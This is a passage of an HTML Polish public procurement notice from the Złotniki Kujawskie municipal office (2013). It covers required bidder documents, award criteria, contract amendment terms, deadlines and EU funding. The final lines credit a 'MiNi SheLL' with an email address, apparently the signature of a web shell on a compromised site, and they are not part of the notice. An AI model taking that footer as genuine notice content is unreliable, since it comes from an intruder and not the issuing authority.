<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorys ofertowy , dowód wniesienia wadium, oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych ,wskazanie części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcom z wykorzystaniem wzoru - Załącznik nr 13, zobowiązanie innych podmiotów - (jeżeli dotyczy) , dokumenty potwierdzające posiadanie  pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące możliwości zmiany postanowień umowy w stosunku do treści oferty: 
1) zmiany osób występujących po stronie Zamawiającego/Wykonawcy, 
2) zmiana adresu/siedziby/firmy Zamawiającego/Wykonawcy,
3) zmiana postanowień zawartej umowy, w stosunku do treści oferty na podstawie, której
dokonano wyboru Wykonawcy, jeżeli zajdzie którykolwiek z niżej wymienionych
warunków:
- zajdzie konieczność wprowadzenia zmian w dokumentacji projektowej w sposobie
lub technologii wykonania przedmiotu umowy, a co się z tym wiąże zastosowaniem robót zamiennych i zamiany materiałów i urządzeń przewidzianych do wykonania robót w stosunku do materiałów i urządzeń przewidzianych w dokumentacji projektowej, z zachowaniem wymogów technicznych i jakościowych,
- gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy
okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie
ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania
umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający
dopuszcza możliwość zmiany umowy, a w szczególności terminu realizacji
zamówienia.
4) przedłużenia terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie będzie miało wpływ na wykonanie przedmiotu umowy i uwarunkowane jest: 
a) wstrzymaniem robót przez Zamawiającego w okolicznościach, za które nie ponosi Wykonawca żadnej odpowiedzialności; 
b) wykopaliskami uniemożliwiającymi wykonywanie robót; 
c) szczególnie niesprzyjającymi warunkami atmosferycznymi i gruntowymi uniemożliwiającymi prowadzenie robót budowlanych  zgodnie ze sztuką budowlaną i wiedzą techniczną; 
d) koniecznością dokonania istotnych zmian w dokumentacji projektowej na wniosek stron; 
e) wystąpieniem siły wyższej; 
5) zmiany w harmonogramie rzeczowo-finansowym robót na wniosek Zamawiającego,  
   Instytucji zarządzającej lub w okolicznościach, za które nie ponosi żadnej  
   odpowiedzialności Wykonawca - na jego wniosek;
6) konieczności usunięcia błędów w dokumentacji projektowej oraz  konieczności 
    przeprojektowania  określonych zakresów  obiektu w trakcie realizacji inwestycji, 
    niezbędnych  do prawidłowego wykonania  przedmiotu umowy;
7) wystąpienie innych szczególnych okoliczności, za które Wykonawca  nie jest 
    odpowiedzialny, 
Warunki dokonania zmian: 
a) zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, 
    wyrażoną na piśmie, pod rygorem nieważności, 
b) strona występująca o zmianę postanowień zawartej umowy: 
- opisze zaistniałe okoliczności, 
- uzasadni, udokumentuje zaistnienie powyższych okoliczności, 
- opisze wpływ zmian na termin wykonania umowy. 
c) wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zlotnikikuj.ires.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Złotniki Kujawskie
ul.Powstańców Wielkopolskich 6
88-180 Złotniki Kujawskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2013 godzina 11:00, miejsce: Urząd Gminy Złotniki Kujawskie ul.Powstańców Wielkopolskich 6, 88-180 Złotniki Kujawskie, pokój nr 27 , I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007-2013 w ramach działania  313,322,323 Odnowa i rozwój wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com